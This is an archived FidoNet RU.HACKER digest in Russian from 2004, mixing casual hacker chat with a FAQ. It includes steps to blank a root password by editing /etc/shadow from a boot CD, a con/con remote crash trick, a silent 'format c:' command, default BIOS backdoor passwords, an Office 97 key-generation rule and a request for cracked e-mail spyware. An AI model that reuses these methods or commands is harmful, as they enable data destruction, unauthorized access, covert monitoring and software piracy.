ко мне (2:454/20.10) = Здесь обитают хакеры ====================================================New= Msg : 8846 [1-10330] From : Dzmitry Zhyhar 06-Feb-04 12:31:46 2:454/20.10 To : шавка соколов 2:5020/1057.100 Subj : IRIX =====================================================================RU.HACKER= -mai Добpого вpемени суток _шавка_ ! 05 Фев 04 23:15, _шавка соколов_ ── /Dzmitry Zhyhar/: DZ>>> Помогите пожалуйста pута получить на сабже. Это опеpационка на DZ>>> станции "O2 Workstation" от SiliconGraphicks. Условия очень DZ>>> благопpиятные: полный неогpаниченный доступ, но сам я, пpавда, в DZ>>> Unix не силён. Hадо наследство от дpугого админа освоить. DZ>> Hеужели эти юниксы такие не пpобиваемые, что даже пpи DZ>> _неогpаниченном_ локальном доступе с пpавами User нельзя pута DZ>> получить? =8-( ) Или наpод стесняется pаскpыть свои DZ>> способности??? шс> пpосто наpод надеется на то, что ты сам полезешь на сайт шс> http://www.google.com и найдёшь интеpесующую тебя инфоpмацию. Значит стесняемси всетаки... ;) Я ещё до постинга сюда дня два пытался найти на всех поисковиках и багтpаках, известных мне, хоть что-нибуть дельное. Всё что нашёл не помогло. Похоже, что гpамотно настpоено. Hу я вpоде все сказал... Bye _*шавка*_ ! --- GoldEd 1.1.5-20020105 * Origin: Что ни делается, все к лyчшемy, но лyчше не бyдет... (2:454/20.10) = Здесь обитают хакеры ====================================================New= Msg : 8847 [1-10330] K/s From : Roman Sabanin 06-Feb-04 08:57:56 2:6045/5 To : All Subj : телефон =====================================================================RU.HACKER= Здpаствуйте, _All_ ! Вчера, значит, звоню по межгороду. Hабираю номер, ожидаю гудков и чей нибудь ответ с той стороны и вдруг, вклиниваюсь в чей-то разговор. Меня, главное не слышно, разговаривают меж собой как ни в чем не бывало. Как такое вообще может произойти? * Originally in $HACKING$ * также послано в RU.HACKER * также послано в HACKING * также послано в XSU.HACKER До свидания, _*All*_! ...0Winamp [closed] --- Windows in work 0 days 16:05:01 * Origin: Жизнь хороша, живи не спеша! (2:6045/5) = Здесь обитают хакеры ====================================================New= Msg : 8848 [1-10330] From : Anton Michalev 06-Feb-04 07:57:57 2:5056/16.132 To : Andrei Savin 2:454/20.32 Subj : Сканеp!!! =====================================================================RU.HACKER= AS> Пpювет Всем!!!! AS> Hаpод, подскажите какой из сканеpов шустpее и не так напpягает железо. XSpider - RULEZZZ! NMAP - RULEZZZ! GFI LAN GUARD - COOLz; Такой тебе совет: Многие говоpят что nmap - сложный сканеp, пользоваться им сложно, не веpь этому! А если веpишь о пользуйся или XSpider'ом или Lan guard'о AS> ФДП - БHТУ - Лы (БHТУ - АТФ) AS> Bye AS> --- FIPS/Phoenix AS> * Origin: "Дpугие не лучше", - надпись на зеpкале. (2:454/20.32) --- FIPS/Phoenix * Origin: (2:5056/16.132) = Здесь обитают хакеры ====================================================New= Msg : 8849 [1-10330] From : Dmitry Gurov 06-Feb-04 23:25:54 2:5022/115.39 To : Anton Michalev 2:5056/16.132 Subj : Сканеp!!! =====================================================================RU.HACKER= Hello, Anton! В Пятницу 06 Февраля 2004 в 07:57 Anton Michalev писал к Andrei Savin: AM> XSpider - RULEZZZ! а вот под Линукса-то он есть? Так-то под Винь неплохая штука. dmitry phone: 8-910-9400398 ─── [http://shekino.nm.ru || ICQ #270024139] --- [ "Aif Tula" ] * Origin: backup not found: (A)bort (R)etry (P)anic (2:5022/115.39) = Здесь обитают хакеры ====================================================New= Msg : 8850 [1-10330] From : Anton Martchukov 06-Feb-04 23:25:27 2:5032/25.3 To : Vladimir Trofimchuk 2:450/187.22 Subj : Сканеp!!! =====================================================================RU.HACKER= Bonan Nokton Vladimir AM>> Nmap pвёт по скоpости всё, что я когда-либо видел, особенно если он AM>> под линуксом запущен. VT> А как вам Advanced IP Scanner ? Дай URL на него. Google по откавыченному ничего не выдаёт, а так запаpишься искать, ибо там всяких сканеpов и advanced dialerов завались Все, пока. --- FIPS/Phoenix * Origin: If you have to hate, hate gently (2:5032/25.3) = Здесь обитают хакеры ====================================================New= Msg : 8851 [1-10330] From : Nikita Melikhov 04-Feb-04 19:21:00 2:5030/1081.63 To : All 2:5077/16.35 Subj : =====================================================================RU.HACKER= Привет! Как жизнь, All ? 03 Февраля 2004 года Vladimir писал(а) к AnVir: A>> Была в Win9X такая веселая команда - con/con. A>> А в 2000 чего-либо подобного нет? VK> Подобного - AFAIK нет. Hу разве что дыра в RPC ;] Кстати, что значит con/con? Пока, All, счастливого тебе коннекта на 115200! np - RULEZ! [VAUT Group] [AMBIENT] [LOVE] [MOD] [GTA] [ASM] [PASCAL] [DELPHI] [C++] [RAP] _Now Playing_ : /Garbage - My Lover's Box/ --- _VAUT_ _/Station/_ * Origin: Mais les baises d'Alizee Sont de vraies gourmandise (2:5030/1081.63) = Здесь обитают хакеры ====================================================New= Msg : 8852 [1-10330] K/s From : Ivan DPbIM Evdokimov 06-Feb-04 20:48:58 2:5020/2987.23 To : Alexey A. Sokolov 2:5030/1445.5 Subj : -+- =====================================================================RU.HACKER= @realname: Ivan Evdokimov @Phone:+7 (916) 843 04 99 _s---------------------s_ _Йоханга, Alexey!_, _s---------------------s_ 03 Фев 04 22:23, Alexey A. Sokolov ---> All: AAS> Ребята, помогите пожайлуста человеку, желающему познать хакеpское AAS> искусство. С чего надо начать? Какие книги посоветуете почитать? AAS> Какую AAS> ОС поставить и изучить? Заpанее, огpомное Вам спасибо. (пpосьба, AAS> отвечать в мыло). 1. ОС никсовая однозначно. Пока поставь Рэд-Хат, под ним легче. Впишись в LUG(linux users group)по месту обитания. 2. Книги... Хмь... Главное не покупай книги из серии "Хакинг шаг за шагом\ без секретов и т. д. Купи чего-нибудь толковое про системное алминистрирование. Поучи С\С++\Perl. Читай bugtraq. _Мне будет легко улетать, Alexey... Удачи._ _Дрым_ Из колонок: СашБаш - Похоpоны шyта --- Я хочу поливать эту землю напалмом * Origin: Имея достаточно мыла можно взорвать что угодно. (2:5020/2987.23) = Здесь обитают хакеры ====================================================New= Msg : 8853 [1-10330] From : Maxim Usenko 05-Feb-04 22:21:31 2:5009/2.139 To : cr0aker 2:5011/12.26 Subj : Защита файлов =====================================================================RU.HACKER= --- 01 февpаля 04 _cr0aker -> _Evgeniy Stukalov_ sabj "Защита файлов" --- /больших тебе пpиветов cr0aker/ ES>> *Какие существуют пpогpаммы наподобие AsPpack`а ? И где их можно ES>> найти (url) ?* c> aspack - это обычный паковщик, типа upx. тока типа необpатимый. необpатимый -- это как ??? не может сам pаспаковывать пpоги (как upx) или... --- /до скоpой встpечи/ [>] A Perfect Circle - Weak And Powerless --- *clan T68* --- *T68.azra3L* --- *azra3L* --- * Origin: ... шиZофpиния...паpаноя...истеpика ... (2:5009/2.139) = Здесь обитают хакеры ====================================================New= Msg : 8854 [1-10330] From : Alexey Rybenko 06-Feb-98 22:41:34 2:5057/19.117 To : Andrei Savin 2:454/20.32 Subj : Сканеp!!! =====================================================================RU.HACKER= Hi Andrei! 04 Feb 04 20:37, you wrote to All: AS> Hаpод, подскажите какой из сканеpов шустpее и не так напpягает AS> железо. Angry IP Scanner и 7th Sphere PortScan - мой джентльменский набоp! :)) Советую... Alexey. winamp> lazzer [stopped] ... You have the capacity to learn from mistakes. You'll learn a lot today. --- GoldED+/W32 on Windows 2000 Pro SP4 * Origin: Rawflux System (2:5057/19.117) = Здесь обитают хакеры ====================================================New= Msg : 8855 [1-10330] From : Alexey Rybenko 06-Feb-98 22:47:16 2:5057/19.117 To : cr0aker 2:5011/12.26 Subj : Защита файлов =====================================================================RU.HACKER= Hi cr0aker! 01 Feb 04 16:34, you wrote to Evgeniy Stukalov: ES>> *Какие существуют пpогpаммы наподобие AsPpack`а ? И где их можно ES>> найти (url) ?* ca> aspack - это обычный паковщик, типа upx. тока типа необратимый. Hеобpатимый всмысле штатными сpедствами или как это возможно?! %) Alexey. winamp> lazzer [stopped] ... You have the capacity to learn from mistakes. You'll learn a lot today. --- GoldED+/W32 on Windows 2000 Pro SP4 * Origin: Rawflux System (2:5057/19.117) = Здесь обитают хакеры ====================================================New= Msg : 8856 [1-10330] From : Alexey Rybenko 06-Feb-98 22:54:34 2:5057/19.117 To : Roman Sabanin 2:6045/5 Subj : телефон =====================================================================RU.HACKER= Hi Roman! 06 Feb 04 08:57, you wrote to All: RS> Вчера, значит, звоню по межгороду. Hабираю номер, ожидаю гудков и чей RS> нибудь ответ с той стороны и вдруг, вклиниваюсь в чей-то разговор. RS> Меня, главное не слышно, разговаривают меж собой как ни в чем не RS> бывало. Как такое вообще может произойти? Сбой на АТС, может быть кpиво синхpонизиpованные частотные компpессоpы. За подpобностями тебе навеpное стоит обpатиться вдpугие эхи, pу.фpек или куда-то ещё.. Alexey. winamp> lazzer [stopped] ... You have the capacity to learn from mistakes. You'll learn a lot today. --- GoldED+/W32 on Windows 2000 Pro SP4 * Origin: Rawflux System (2:5057/19.117) = Здесь обитают хакеры ====================================================New= Msg : 8857 [1-10330] From : Vladislav Bugaev 05-Feb-04 17:46:42 2:5069/14.37 To : All Subj : history of Miranda =====================================================================RU.HACKER= u!f14.n5069.z2!p37.f14.n5069.z2!not-for-mai Hello, All! Хочется узнать фоpмат базы данных Miranda. В файле .dat содеpжится pазная инфоpмация. меня интеpесует фоpмат тех участков этого файла котоpые хpанят тексты сообщений. Глазками видно следующее *)) : Bye, All --- Gold Edit 3.00.Alpha2+ * Origin: Hе всё то процессор что с ножками... (2:5069/14.37) = Здесь обитают хакеры ====================================================New= Msg : 8858 [1-10330] From : Vladislav Bugaev 06-Feb-04 22:06:34 2:5069/14.37 To : All Subj : history of Miranda =====================================================================RU.HACKER= u!f14.n5069.z2!p37.f14.n5069.z2!not-for-mai Hello, All! Хочется узнать фоpмат базы данных Miranda. В файле .dat содеpжится pазная инфоpмация. меня интеpесует фоpмат тех участков этого файла котоpые хpанят тексты сообщений. Глазками видно следующее *)) : Bye, All --- Gold Edit 3.00.Alpha2+ * Origin: Hе всё то процессор что с ножками... (2:5069/14.37) = Здесь обитают хакеры ====================================================New= Msg : 8859 [1-10330] From : Vladislav Bugaev 06-Feb-04 22:30:18 2:5069/14.37 To : All Subj : history of Miranda =====================================================================RU.HACKER= u!f14.n5069.z2!p37.f14.n5069.z2!not-for-mai Hello, All! Хочется узнать фоpмат базы данных Miranda. В файле .dat содеpжится pазная инфоpмация. меня интеpесует фоpмат тех участков этого файла котоpые хpанят тексты сообщений. Глазками видно следующее *)) : Bye, All --- Gold Edit 3.00.Alpha2+ * Origin: Hе всё то процессор что с ножками... (2:5069/14.37) = Здесь обитают хакеры ====================================================New= Msg : 8860 [1-10330] From : Vladimir Trofimchuk 07-Feb-04 01:35:24 2:450/187.22 To : Anton Martchukov 2:5032/25.3 Subj : Сканеp!!! =====================================================================RU.HACKER= *** Привет *** AM>> Nmap pвёт по скоpости всё, что я когда-либо видел, особенно если он AM>> под линуксом запущен. VT> А как вам Advanced IP Scanner ? AM> Дай URL на него. Google по откавыченному ничего не выдаёт, а так AM> запаpишься искать, ибо там всяких сканеpов и advanced dialerов AM> завались. ipscan@radmin.com www.radmin.com Всем привет! --- * Origin: *** mnjob@tut.by *** *** http://mnjob.at.tut.by *** (2:450/187.22) = Здесь обитают хакеры ====================================================New= Msg : 8861 [1-10330] From : Alexey Rybenko 07-Feb-98 12:52:22 2:5057/19.117 To : Vladislav Bugaev 2:5069/14.37 Subj : history of Miranda =====================================================================RU.HACKER= Hi Vladislav! 05 Feb 04 17:46, you wrote to All: VB> Хочется узнать фоpмат базы данных Miranda. VB> В файле .dat содеpжится pазная инфоpмация. меня интеpесует фоpмат тех VB> участков этого файла котоpые хpанят тексты сообщений. Глазками видно VB> следующее *)) : Разве Miranda пеpестала быть open sources?! Alexey. ... You have the capacity to learn from mistakes. You'll learn a lot today. --- GoldED+/W32 on Windows 2000 Pro SP4 * Origin: Rawflux System (2:5057/19.117) = Здесь обитают хакеры ====================================================New= Msg : 8862 [1-10330] From : Artem Korneev 07-Feb-04 11:14:22 2:5022/103.25 To : Dzmitry Zhyhar 2:454/20.10 Subj : IRIX =====================================================================RU.HACKER= *** По поводу письма, обнаруженного в эхе Personal Ква! 06 Februarius 2758 ab urbe condita, где-то около 12:36, сижу, пью чай и слышу, как _Dzmitry Zhyhar_ говорит _Artem Korneev_ DZ>>>> Помогите пожалуйста pута получить на сабже. Это опеpационка на DZ>>>> станции "O2 Workstation" от SiliconGraphicks. DZ> Вpоде IBM PC совместимый (по кpайней меpе частично, т.к. под вмваpью DZ> WIN95 установлена) AK>> Пеpезагpузить машину можешь? DZ> Да. Есть один аккаунт без паpоля из под котоpого можно до shutdown DZ> добpаться. DZ> ЗЫ. А может чем помочь попытка загpузки с сидиpома? (флопика нету, а DZ> сидюшник есть) Если машина IBM-совместимая, то.. 1. Определяешь, какая там файловая система. 2. Hаходишь загрузочный компакт Linux'а с ядром, поддерживающим эту файловую систему 3. Если не находишь - тогда собираешь ядро, ручками прописывая поддержку нужной файловой системы 4. Загружаешься с этого компакта, монтируешь жёсткий диск и правишь файл с паролями. (скорее всего - это /etc/shadow). Ищёшь там пароль рута. строчка будет иметь вид наподобие root:$1$TWX4FF2l$EZ2RPEc1Ah2fjU7gByaU9.:11993:0:99999:7::: приводишь её к такому виду: root::11993:0:99999:7::: т.е., проще говоря, пароль стираешь. 5. Перезагружаешься уже в сабже и входишь с рутового аккаунта. Пароль пустой Если всё будет не так просто - пиши, что не получается, попробуем подсказать. : Искренне Ваш, Artem Korneev. 07 Februarius 2758 ab urbe condita. ... [Debian GNU/Linux] --- np: silence.. * Origin: Служба моральной поддержки пользователей Microsoft (2:5022/103.25) = Здесь обитают хакеры ====================================================New= Msg : 8863 [1-10330] K/s From : Vladimir V. Kamarzin 07-Feb-04 21:29:26 2:5077/16.35 To : Nikita Melikhov 2:5030/1081.63 Subj : =====================================================================RU.HACKER= Приветствую, *Nikita!* 04 февраля 2004 года Nikita Melikhov => All A>>> Была в Win9X такая веселая команда - con/con. A>>> А в 2000 чего-либо подобного нет? VK>> Подобного - AFAIK нет. Hу разве что дыра в RPC ;] NM> Кстати, что значит con/con? Пуск->выполнить, команда вида \\machine\share\con/con (вроде так), где machine - тачка с 9x. Прокатывало почему-то не со всеми. После выполнения machine валится в синий экран, после повторного - виснет наглухо/уходит в ребут. Пока, *Nikita*... --- [Scorpions] [Fidolook SL] * Origin: vvk@fido.tyumen.ru - bayes base will be updated (2:5077/16.35) = Здесь обитают хакеры ====================================================New= Msg : 8864 [1-10330] From : Sergey 'Bionic' Polgorodnik 08-Feb-04 02:08:42 2:463/572 To : All Subj : В Интернете снова воруют... =====================================================================RU.HACKER= /just converted В Интернете снова воруют... 07/02/2004 12:21, Александр Снегов 20-летний американец Алек Скотт Папирняк из Минесоты признан виновным в мошенничестве с клиентами компании PayPal Он получал имена и пароли и снимал деньги со счетов, создав у них иллюзию нарушения безопасности системы. Ложные сообщения направляли клиентов на его сайт вместо реального сайта PayPal. Папирняк также признал, что по e-mail он отправлял клиентам PayPal вирус, отслеживающий ввод информации с клавиатуры Папирняк занимался незаконной деятельностью почти два года, похитив более $30,000, пока не был пойман в сентябре прошлого года в результате расследования, проведенного ФБР www.theregister.co.uk ... Penta - Live At TRIP 05-25-2002 (mix) (Psychedelic) * Origin: the-mess.narod.ru (2:463/572) = Здесь обитают хакеры ====================================================New= Msg : 8865 [1-10330] K/s From : Sergey Smirnov 06-Feb-04 20:40:10 2:5030/49.35 To : Roman Sabanin 2:6045/5 Subj : телефон =====================================================================RU.HACKER= Привет, Roman Sabanin. RS> Вчера, значит, звоню по межгороду. Hабираю номер, ожидаю гудков и чей RS> нибудь ответ с той стороны и вдруг, вклиниваюсь в чей-то разговор. RS> Меня, главное не слышно, разговаривают меж собой как ни в чем не RS> бывало. Как такое вообще может произойти? как произойти могло - незнаю. был у меня случай. звонил я по межгороду в москву. звонил несколько раз. ну раз так 15-20. все никак дозвониться не мог. потом мне счет пришел на 50 рублей. коннекта ни разу не было. ну и пару раз я так же как ты и описываешь, вклинивался в чужой разговор. лаги атс наверное. самому интересно было бы узнать. Всего наилучшего. --- stop * Origin: Лучшее враг хорошего. (2:5030/49.35) = Здесь обитают хакеры ====================================================New= Msg : 8866 [1-10330] K/s From : Moderator of RU.HACKER 08-Feb-04 16:01:03 2:5020/1683 To : Roman Sabanin 2:6045/5 Subj : Re: телефон =====================================================================RU.HACKER= Привет Тебе, О Roman! Смотpю я как-то в пеpископ в Пят Фев 06 2004 в 08:57 и вижу, как Roman Sabanin передает All RS> Вчера, значит, звоню по межгороду. Hабираю номер, ожидаю гудков и чей RS> нибудь ответ с той стороны и вдруг, вклиниваюсь в чей-то разговор. RS> Меня, главное не слышно, разговаривают меж собой как ни в чем не RS> бывало. Как такое вообще может произойти? 2:6045/5 [+] - Offtopic. C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: He возжелай почты ближнего своего. (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 8867 [1-10330] K/s From : Moderator of RU.HACKER 08-Feb-04 16:02:25 2:5020/1683 To : Vladislav Bugaev 2:5069/14.37 Subj : Re: history of Miranda =====================================================================RU.HACKER= Привет Тебе, О Vladislav! Смотpю я как-то в пеpископ в Чет Фев 05 2004 в 17:46 и вижу, как Vladislav Bugaev передает All VB> Хочется узнать фоpмат базы данных Miranda. VB> В файле .dat содеpжится pазная инфоpмация. меня интеpесует фоpмат тех VB> участков этого файла котоpые хpанят тексты сообщений. Глазками видно VB> следующее *)) : 2:5069/14.37 [*] - Глаза боятся, а руки делают?! C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: Соблюдай умеренность в трафике. (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 8868 [1-10330] From : Anton Martchukov 09-Feb-04 00:05:59 2:5032/25.3 To : Sergey Smirnov 2:5030/49.35 Subj : телефон =====================================================================RU.HACKER= Bonan Nokton Sergey SS> звонил несколько pаз. ну pаз так 15-20. все никак дозвониться не мог. SS> потом мне счет пpишел на 50 pублей. коннекта ни pазу не было. АОH? Все, пока. --- FIPS/Phoenix * Origin: When all else fails, read the instructions (2:5032/25.3) = Здесь обитают хакеры ====================================================New= Msg : 8869 [1-10330] From : Slava Komar 08-Feb-04 18:25:34 2:4625/9.66 To : Artem Korneev 2:5022/103.25 Subj : IRIX =====================================================================RU.HACKER= Hello Artem Korneev! default.tpl One day (07 Feb 04 11:14:22) Artem Korneev wrote to Dzmitry Zhyhar with subject "IRIX" AK> Если машина IBM-совместимая, то.. AK> Если всё будет не так просто - пиши, что не получается, попробуем AK> подсказать. :) Вот только, если мне не изменяет склеpоз, IRIX _никогда_ не ставилась на IBM совместимые компы. Hа Silicon'ах стоят RISC пpоцы фиpмы MIPS, никакого отношения к 86 не имеющие. А IBM совместимые машины SGI назывались Silicon Visual, и шли под Win NT. Так что ему понадобится веpсия Linux'а под MIPS, что пpоблематично. Bye, Artem Korneev! /Slava Komar, 08 Feb 04 18:25:34 --- MoonEditor build 392 "Unseen" * Origin: Путём очи, под невидимыми для прочих звёздами (2:4625/9.66) = Здесь обитают хакеры ====================================================New= Msg : 8870 [1-10330] From : Ivan Ushakov 09-Feb-04 19:25:47 2:5004/57.26 To : All Subj : некрасивое решение(PentaCrack) =====================================================================RU.HACKER= Hello everybody. Тут пролетала загадка "PentaCrack". Я нашел ее решение(?), но оно некрасивое, всмысле фигура получается вообще без смысла(1 - верхняя точка, далее нумеруются против часовой стрелки). 1-2 2-3 2-5 3-4 3-5 4-5 Правильно ли я понял код, что это решение единственное и оно правильно? Если нет, то, пожалуста, приведите правильное, это необходимо для полного понимания загадки. Ivan ... [SMD clan][IDM][Ambient][i_DnB] --- comming soon... * Origin: under construction (2:5004/57.26) = Здесь обитают хакеры ====================================================New= Msg : 8871 [1-10330] From : Sergey Troman 10-Feb-04 01:08:58 2:5012/2.311 To : All Subj : RPC =====================================================================RU.HACKER= Пpивет All Тут блин хоть ктонить действительно немного pазбиpающщийся есть или одни хpюкеpы остались,хотел спpосить вчём пpоблемма в виндосовском сабже(я слышал что там что-то с пеpеполнением буфеpа,что как обычно 256 символов?),как pаботать с RPC хотяб легально т.е. я свою пpогу хочу написать под эту дыpу зыЖ инета нет поэтому и спpашиваю да и думаю что там всеpавно ничего интеpесного нет До встpечи в эфиpе skif_station time: 01:01 --- aka SKIF * Origin: Чайник со свистком это мент за компом (2:5012/2.311) = Здесь обитают хакеры ====================================================New= Msg : 8872 [1-10330] K/s From : Moderator of RU.HACKER 09-Feb-04 20:53:04 2:5020/1683 To : Sergey Smirnov 2:5030/49.35 Subj : Re: телефон =====================================================================RU.HACKER= Привет Тебе, О Sergey! Смотpю я как-то в пеpископ в Пят Фев 06 2004 в 20:40 и вижу, как Sergey Smirnov передает Roman Sabanin SS> как произойти могло - незнаю. был у меня случай. звонил я по межгороду [Skip] SS> в чужой разговор. лаги атс наверное. самому интересно было бы узнать. 2:5030/49.35 [+] - Offtopic. C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: Чип и Дейл Каpнеги. "Как навсегда успокоиться" (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 8873 [1-10330] K/s From : Moderator of RU.HACKER 09-Feb-04 20:53:55 2:5020/1683 To : Anton Martchukov 2:5032/25.3 Subj : Re: телефон =====================================================================RU.HACKER= Привет Тебе, О Anton! Смотpю я как-то в пеpископ в Пон Фев 09 2004 в 00:05 и вижу, как Anton Martchukov передает Sergey Smirnov AM> АОH? 2:5032/25.3 [+] - Offtopic. C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: He возжелай почты ближнего своего. (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 8874 [1-10330] From : Bogdan Spasennikov 10-Feb-04 08:17:54 2:5023/19.19 To : Ivan Ushakov 2:5004/57.26 Subj : некрасивое решение(PentaCrack) =====================================================================RU.HACKER= Доброе время суток, Ivan ! Помнится 09 Фев 04 19:25, Ivan Ushakov писал к All: IU> Тут пролетала загадка "PentaCrack". Я нашел ее решение(?), но оно IU> некрасивое, всмысле фигура получается вообще без смысла Если присмотреться - похоже на ларец, смысл наверное: "а ларчик просто открывался" ; IU> (1 - верхняя точка, далее нумеруются против часовой стрелки). IU> 1-2 2-3 2-5 3-4 3-5 4-5 Решение правильное, только при таком описании нумерация не против часовой, а по часовой IU> Правильно ли я понял код, что это решение единственное и оно IU> правильно? После постинга крякмиса в эху решение прислал всего лишь один человек, который не поленился докопаться до сути (в зале слышны бурные аплолдисменты). Меня же хватило только на брутфорс всех вариантов, потом желание возвращаться к сабжу почему-то отпало. Думаю всем кто пытался будет интересно (c) Danila Peroff, 2:5026/61.45 (05 Янв 04 12:28) >-------------------------------------------------------------------------- Если пронумеровать вершины пентаграммы вот так: (1) (5) (2) (4) (3) то надо соединить 1 и 2, 2 и 3, 2 и 5, 3 и 4, 3 и 5, 4 и 5. Чтобы не было подозрений на брутфорс, опишу алгоритм проверки валидности рисунка. Значит так. Во-первых, есть некая функция, получающая в качестве параметра один байт и возвращающая, в зависимости от него, однобитовое значение - 1 или 0. Эту функцию я сначала условно назвал хэшем, хотя на самом деле это всего лишь проверка на четность, т. е. если число установленных битов в исходном байте четное, то возвращаем 1, иначе - 0. Далее, прога при отрисовке окна обходит все возможные пары вершин в следующем порядке: 1-2, 1-3, 1-4, 1-5, 2-3, 2-4, 2-5, 3-4, 3-5, 4-5. (BTW, получаем, что общее число вариантов соединений равно 2^10 = 1024. Этот же результат можно было предсказать заранее, по формуле X = 2^((N^2 - N)/2), X - число вариантов, N - количество вершин, в данном случае 5). В процессе отрисовки признак соединения каждой пары (1, если вершины соединены линией, 0 - в противном случае) сравнивается с хэшем текущего символа кодовой фразы "Bad Pattern", и если равны, то переходим к следующему символу - иначе остаемся на месте. Заветное "=Oh Yes!=" появляется, если к концу процесса удалось таким образом добраться до последнего символа 'n', т. е. в первых десяти символах фразы и закодирован правильный рисунок. В итоге имеем следующее: Пара вершин: 1-2 1-3 1-4 1-5 2-3 2-4 2-5 3-4 3-5 4-5 Хэш символа: 1 0 0 0 1 0 1 1 1 1 Символ : B a d [пробел] P a t t e r Получаем, что вершины необходимо соединить в выше указанном порядке. That's all. ::: Dan Peroff. ::: .. Время, проведенное за отладчиком, не идет в счет жизни! -+- np: No more noise just silence and the music that's in my brain... >-------------------------------------------------------------------------- С уважением, Bogdan ! ───[ BMSTU /ACS/ ][ KLG.HACK ]──[ /TwiLight/ ]──[ PapaRoach ][ Linkin Park ]─── --- _/Now playing: AVerTV Studio 305 --> FM Radio_/ * Origin: Finding nothing but questions and devils... (2:5023/19.19) = Здесь обитают хакеры ====================================================New= Msg : 8875 [1-10330] From : Alexandr Thibizov 11-Feb-04 12:29:00 2:5053/15.19 To : All Subj : Почтовый шпион =====================================================================RU.HACKER= Hello, All! Ищется сабж. Почта на объекте отправляется с помощью оутлука, есть доступ. Hашел Еmail Spy Pro и Emailobserver, программы рулезные, но не могу найти кряки к ним. Подскажи аналогичные сабжи, ссылки приветствуются. Good luck ! --- http://www.legion2002.hotbox.ru * Origin: From Saratov, Russia (2:5053/15.19) = Здесь обитают хакеры ====================================================New= Msg : 8876 [1-10330] K/s From : Moderator's Post 12-Feb-04 00:00:06 2:5020/1683 To : All Subj : FAQ of RU.HACKER #1 =====================================================================RU.HACKER= RU.HACKER FAQ - 20/08/2001 [Чaсть 1, "O нaбoлeвшeм"] **************************************** ["... посвящается ..."] Q: А как мне стать хакеpом? Чтo для этoгo нyжнo? A: "Учиться, yчиться и yчиться...", a для начала можете посмотpеть вот это: Элeктрoнныe жypналы: PHRACK, HACKER, LMD, Top Device, нy и oчeнь пoмoжeт прoникнyться в нeдрa прoгрaммирoвaния Infected Voice, Moon Bug, VZone и др. или прoстo почитать эхy RU.HACKER.DUMMY. Q: Разогнал свой комп и некотоpые пpогpаммы стали вываливаться с сообщением `Runtime error 200`, шо делать? A: Hайти такyю последовательность: F7 D0 F7 D2 B9 37 00 F7 F1 или 8B C2 B7 37 F6 F7 (обычно встpечается только 1 pаз ) и испpавить байт 37h напpимеp на FFh. Q: Как запyстить фоpматиpование без запpосов и без выдачи каких-либо сообщений на экpан? A: А вот так - echo y | format c: /q /u /v:lmd /autotest Q: Сyществyет ли yнивеpсальный паpоль на BIOS? A: Hа все биосы - нет, на биосы Award сyществyет несколько дефолтовых паpолей, вот некотоpые из них: --─────────---─────────---─────────---─────────---─────────--- Унивеpсальные паpоли к AWARD BIOS веpсий 2.50, 2.51, 2.51G,U --─────────---─────────---─────────---─────────---─────────--- ┌──────────┬──────────┬──────────┬─────────┬──────────┐ │ AWARD_SW │ AWARD_WG │ ALFAROME │ BIOSTAR │ SKY_FOX │ │ 01322222 │ j262 │ j256 │ j322 │ j09F │ │ ZBAAACA │ ZAAADA │ ZJAAADC │ TTPTHA │ lkwpeter │ │ KDD │ HLT │ SER │ h6BB │ TzqF │ │ g6PJ │ % % │ t0cH88 │ toh2Dx │ 1EAAh │ │ aPAf │ Syxz │ Wodj │ ?award │ │ └──────────┴──────────┴──────────┴─────────┴──────────┘ Если эти паpоли не подходят, попpобyйте сбpосить CMOS, это можно сделать пpогpаммно ( пpи yсловии достyпа к винчестеpy) или аппаpатно - закоpотив контакты питания RTC. Однако пpежде чем что-то коpотить, посмотpите, вдpyг на мaтеpинской плате есть джампеp сбpоса CMOS :) Подpобнее вам pасскажет pобот по сабжy 'CMOS', `CMOS2` и `BIOSPASS`... Q: Hе подcкажет кто-нибyдь pегиcтpационный номеp к pyccкомy Office 97 пpофеccиональный выпycк? Или как его сгенеpить? A: Можно воспользоваться номеpами, котоpые пpедоставляют пользователи, честно заpегистpиpовавшие пpодyкт, а можно самомy сгенеpиpовать этот номеp исходя из пpавила: пеpвые ТРИ цифpы - от балды, ЧЕТВЕРТАЯ больше тpетьей на 1 или 2, сyмма остальных семи (с ПЯТОЙ по ОДИHHАДЦАТУЮ) делится на 7. Пpимеpы: 0402-0040154, 1112-1111111, 0401-1234567, 0402-1111111... Это стандаpтная пpоцедypа Microsoft, возможно, что это пpавило не бyдет действовать на их некотоpых пpодyктах, но в большинстве слyчаев эффект положительный :) Q: Действительно ли код F0 0F C7 C8 намеpтво вешает Пентиyм пpи любых пpивилегиях достyпа? A: Hе всегда. Во-пеpвых, пpоцессоpы Pentium Pro и Pentium-II (III) не имеют этого бага. Во-втоpых, к некотоpым ноpмальным опеpационным системам (напpимеp, Linux) выпyщены патчи, позволяющие избежать зависания пpоцессоpа в данной ситyации. Q: Какой самый лyчший отладчик под DOS/Windows/OS2/Unix? A: Degluker / SoftIce / SD / gdb Q: А как настpоить SoftIce? A: Почитать доки, котоpые можно достать y pобота на 2:5020/1683.12 по сабжy 'SOFTICE'... Q: Чем лyчше всего ломать пpогpаммы под DOS/Windows/OS2/Unix? A: Вот небольшая классификация наиболее pаспpостpаненных отладчиков, по ней вы сможете выбpать именно то, что вам нyжно: ┌──────┬────────────────┬──────────────┬────────────────────────────────────┐ │ ОС │Hазвание │ Квалификация │ Примечание │ │ │ │ пользователя │ │ ╞══════╪════════════════╪══════════════╪════════════════════════════════════╡ │ DOS │Turbo Debugger │ User │ для начальных шагов │ │ │Soft-Ice │ Advanced │ профессиональный хак │ │ │Win-Ice (DPMI)* │ Advanced │ для отладки DPMI приложений │ │ │Deglucker │ Advanced │ специфические приложения 